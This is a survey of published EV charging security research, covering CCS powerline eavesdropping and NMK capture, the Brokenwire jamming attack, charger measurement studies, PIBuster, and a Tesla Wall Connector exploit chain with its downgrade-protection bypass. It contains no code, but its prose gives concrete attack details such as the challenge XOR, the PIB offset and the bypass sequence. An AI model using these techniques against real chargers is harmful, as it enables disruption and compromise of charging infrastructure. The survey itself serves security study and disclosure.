EV Charging
Electric vehicles add two attack surfaces that conventional cars do not have. DC fast-charging via the Combined Charging System (CCS) runs an IP stack over the Control Pilot wire using HomePlug Green PHY (HPGP) powerline communication, and the way the physical layer is built lets that signal leak wirelessly. Smart AC chargers such as the Tesla Wall Connector carry their own firmware, network stacks, and bidirectional protocol communication with the vehicle. The Oxford group (Martinovic, Baker, Köhler, Szakály) has worked through the CCS PHY side from 2019 to 2025, and Synacktiv researcher David Berard published a two-part Wall Connector analysis in 2025 and 2026.
CCS PLC Layer and PHY
HomePlugAV PLC: Practical Attacks and Backdooring
Dudek (Synacktiv), NoSuchCon 2014 [1]
This one sets up the EV-charging research below. HomePlugAV is the OFDM-over-mains powerline standard, and its HomePlug Green PHY variant is reused inside CCS charging. Dudek found three problems. The Network Membership Key (NMK) that encrypts traffic is exposed in cleartext over the local Ethernet interface during pairing. The Direct Access Key passphrase used to set the NMK is a deterministic function of the device MAC on Qualcomm Atheros parts. And the same management channel allows arbitrary memory read and write on the PLC modem. The Qualcomm QCA7000 modem family later turns up in most CCS stations surveyed by Szakály et al.
V2G Injector: Whispering to Cars and Charging Units Through the Power-Line
Dudek, Delaunay, Fargues (Synacktiv), SSTIC 2019 [2]
V2G Injector was the first open-source tool for packet capture and injection on the HomePlug Green PHY layer used by CCS electric vehicle charging. Until it existed, no publicly available equipment could interface with V2G powerline traffic at all. Commercial analysis tools cost thousands of euros and captured only a limited packet count. The tool is open source at github.com/FlUxIuS/V2GInjector.
The hardware is a Devolo HomePlug GP development kit based on the Qualcomm QCA7000 modem, bought for roughly 200 euros. They exposed the QCA7000's SPI/Ethernet interface so custom firmware and Scapy layers could drive it directly. On the software side they wrote the missing Scapy protocol layers for HPGP, the SECC Discovery Protocol, and V2GTP. They also built a fuzzy EXI decoder that tries multiple XML Schema grammars to recover V2G message content without any context state.
The NMK-sniffing technique carries over from Dudek's 2014 HomePlugAV work [1]. A device put into PEV mode can passively receive the CM_SLAC_MATCH.CNF from any nearby EVSE and read the NMK in cleartext, since SLAC management messages are broadcast unencrypted over the powerline.
Once inside the AV Logical Network (AVLN), an attacker can inject traffic either by ICMPv6 neighbour spoofing or by racing the SECC procedure with a crafted SECC response that redirects the vehicle's traffic to an attacker-controlled IPv6 endpoint.
They also find a weakness in the SDP SecurityProtocol field that can downgrade the session from TLS to cleartext. The Oxford group's academic work built on it. Baker 2019 cites the SLAC NMK-capture approach and builds a purpose-built SDR receiver around the same underlying flaw.
Devolo dLAN Green PHY eval board (EU II), the HomePlug Green PHY development kit based on the Qualcomm QCA7000 modem used by V2G Injector. Product photo: Codico.
Losing the Car Keys: Wireless PHY-Layer Insecurity in EV Charging
Baker, Martinovic, USENIX Security 2019 [3]
Baker and Martinovic gave the first complete picture of the wireless side channel in CCS. HomePlug Green PHY delivers an IP stack over the Control Pilot and Protective Earth lines. A CAN square wave changes shape as it couples from cable to air, but an OFDM waveform stays almost intact, which makes passive interception practical with standard SDR hardware.
The CCS session opens with the SLAC handshake, in which the vehicle sends sounding messages and the charger reports attenuation to prove physical connection. At the end of SLAC, the charger transmits the Network Membership Key (NMK) to the vehicle in the CM_SLAC_MATCH.CNF message, in plaintext, with no confidentiality option. An attacker who captures this exchange can join the HPGP network and decrypt all subsequent MAC-layer traffic.
The authors built the first wireless eavesdropping tool for HomePlug GreenPHY. It implements the full software receiver path, from frame detection through OFDM demodulation, turbo-code FEC, and CRC validation. Across 54 sessions at public chargers with three production EVs, it recovered 91.8% of packets with valid CRC32 checksums from an adjacent parking bay 4.2 m away. No session used TLS. Long-term vehicle identifiers showed up in 76% of sessions, which allows user tracking and, where AutoCharge billing is deployed, free charging on another account. As a fix, the paper proposes an optional ECDH step in the SLAC handshake for confidentiality.
Field eavesdropping setups: (Figure 7) capturing from the adjacent parking bay with the antenna more than 4 metres from the charging cable, and (Figure 8) sitting between two simultaneously charging vehicles to capture NMK key establishment for both. Figure from Baker, Martinovic, 2019 (Losing the Car Keys).
Brokenwire: Wireless Disruption of CCS Electric Vehicle Charging
Köhler, Baker, Strohmeier, Martinovic, NDSS 2023 [4]
The same PHY behaviour that makes passive eavesdropping easy also opens up an active disruption attack.
HPGP requires Carrier Sense Multiple Access with Collision Avoidance (CSMA/CA), so any node that hears an ongoing transmission backs off. Brokenwire abuses that rule by transmitting a continuous stream of HPGP preamble symbols. Both ends of the charging session read the channel as permanently busy and cannot transmit. After roughly two seconds the ISO 15118 message timeout expires and the session aborts, and the standard then requires manual intervention (unplug and replug) before a new session can begin.
The attack needs a 1 W amplifier, a commodity LimeSDR tuned to 17 MHz, and a 7 m dipole antenna, for under $1,000. It beats broadband noise jamming by three orders of magnitude, because it works against the protocol's own CSMA/CA logic instead of trying to overpower HPGP's noise resistance. Real-world testing covered eight vehicles and twenty chargers across several European public deployments and succeeded in every combination tried, with a maximum effective range of 47 m. The abused behaviour is required by HomePlug Green PHY, DIN 70121, and ISO 15118, so every conforming implementation is vulnerable, including fleet vehicles, electric buses, and ferries that rely on overnight CCS charging.
Five attack scenarios tested in the real-world evaluation, from single-vehicle drive-by disruption (Scenario 1) to multi-vehicle fleet denial from across the street (Scenario 5), with the attacker remaining inside their own vehicle. Figure from Köhler et al., 2023 (Brokenwire).
Aerial distance measurement for Scenario 5, showing the 47.39 m range between the attacker vehicle and the target charging bay across a street intersection. Figure from Köhler et al., 2023 (Brokenwire).
Current Affairs: A Security Measurement Study of CCS EV Charging Deployments
Szakály, Köhler, Martinovic, USENIX Security 2025 [5]
CCS security problems had been public since 2019, so Szakály and colleagues set out to measure how many deployed chargers had actually fixed them.
They built an EV emulator that walks through the full CCS sequence (CP/PE signalling, SLAC, SDP, TLS negotiation, V2G protocol negotiation), with relay-controlled automatic reconnection so collection could run unattended at scale. The dataset covers 325 chargers from 26 manufacturers across four European countries, manufactured between 2013 and mid-2023. 88% implement no TLS whatsoever. ISO 15118-2 support (optional TLS) reached only 47% overall, and no charger had deployed ISO 15118-20, which mandates mutual TLS.
Separately, 78% of chargers used the Qualcomm QCA7000 modem, and most ran firmware from 2013 to 2015, none dated after the 2022 Brokenwire disclosure. In some manufacturer implementations the NMK could be derived directly from the publicly broadcast Network Identifier.
Short: PIBuster - Exploiting a Common Misconfiguration in CCS EV Chargers
Szakály, Köhler, Martinovic, USENIX VehicleSec 2025 [6]
This short paper takes a finding from "Current Affairs" and turns it into an attack. The Qualcomm HPGP modem in CCS chargers keeps all of its configuration in a binary Parameter Information Block (PIB), and many chargers leave that PIB remotely readable and writable over the PLC interface.
Binary analysis and controlled experiments pinned it down to a single byte at offset 0x1F8C that controls remote PIB access. When that byte is zero, which appears to be the factory default, any device that has completed SLAC can overwrite the modem's entire configuration. Of 69 CCS connectors tested at California public stations, 41 had the vulnerable setting. The writable fields include the NMK, the SLAC mode byte, and the SPI interface enable bit. Disabling SPI cuts the only link between the PLC modem and the charger's host processor, a persistent denial of service that can only be recovered by replacing the hardware. Qualcomm acknowledged the issue, issued a CVE, and committed to flipping the default in future firmware.
PIB binary layout showing the first 0x80 bytes with colour-coded fields: MAC address, HFID manufacturer string, NMK, and security control byte at 0x1F8C. Figure from Szakály et al., 2025 (PIBuster).
Level 1 and 2 Chargers
Exploiting the Tesla Wall Connector from its Charge Port Connector
Berard (Synacktiv), Pwn2Own Automotive 2025 [7]
Berard's Pwn2Own Automotive 2025 entry uses the charging cable as its entry point. The Tesla Wall Connector Gen 3 runs a Marvell 88MW300 (ARM Cortex-M4) on an AW-CU300 connectivity card, plus an STM32 co-processor for relay control, and it does not use HPGP. After the standard CP/PE signalling, the charger switches to a proprietary Single-Wire CAN (SWCAN) protocol at 33.3 kbps on the Control Pilot line. None of this is publicly documented; Berard worked it out with an oscilloscope.
The AW-CU300 firmware exposes a full UDS stack over SWCAN on CAN ID 0x604. Security access at level 5 needs only each byte of the 16-byte challenge XORed with 0x35. A debug firmware build (0.8.58), pulled from a 2020 Tesla infotainment dump, has two features the release build lacks: a UDS ReadDataByIdentifier command that returns the Wi-Fi PSK, and a TCP debug shell over the charger's setup AP. At the time of the competition there was no anti-downgrade check, so nothing stopped an older image from being uploaded through the standard 0x34/0x36/0x37 sequence. Synacktiv downgraded to 0.8.58 over SWCAN (~15 minutes at 33.3 kbps), read the PSK via UDS, joined the AP, and reached the debug shell. Code execution came from a global buffer overflow in the shell's argument parser, where a 17th argument overwrites the adjacent function-pointer table in a region mapped RWX. Tesla patched it by adding anti-downgrade protection.
Single-Wire CAN protocol exchange captured on the Control Pilot line during a Tesla Wall Connector session. Figure from Berard (Synacktiv), 2025 (Exploiting the Tesla Wall Connector).
Exploiting the Tesla Wall Connector from its Charge Port Connector - Part 2: Bypassing the Anti-Downgrade
Berard (Synacktiv), Pwn2Own Automotive 2025 [8]
Tesla's patch introduced a ratchet integer in each firmware image; routine 0x201 (switch_to_new_firmware) reads the current ratchet from persistent storage and rejects any image with a lower value.
The bypass hinges on an ordering bug between two routines. Routine 0x201 commits the partition layout and bumps the generation counter of the validated slot; the bootloader then picks the slot with the highest counter and checks CRC and RSA signature, but not the ratchet. Routine 0xFF00 (prepare_passive_slot) picks the physical slot to erase from a boot flag that is set once at startup and never updated mid-session. The sequence: (1) upload a current signed image and call 0x201, passing the ratchet check and setting that slot's generation counter to highest; (2) call 0xFF00 without rebooting so the same physical slot is selected as passive and erased; (3) upload old firmware 0.8.58 into the now-empty slot; (4) call 0x202 to reboot, bypassing 0x201 entirely. The bootloader finds the slot with the highest counter, verifies the legitimately signed old image, and executes it. Two firmware transfers raise the total attack time to around 30 minutes. Tesla issued a fix after disclosure.
Main board of the Tesla Wall Connector Gen 3 showing the AW-CU300 connectivity card (Marvell 88MW300, ARM Cortex-M4), the STM32 co-processor, and the absent Qualcomm PLC chipset footprint. Figure from Berard (Synacktiv), 2025 (Exploiting the Tesla Wall Connector).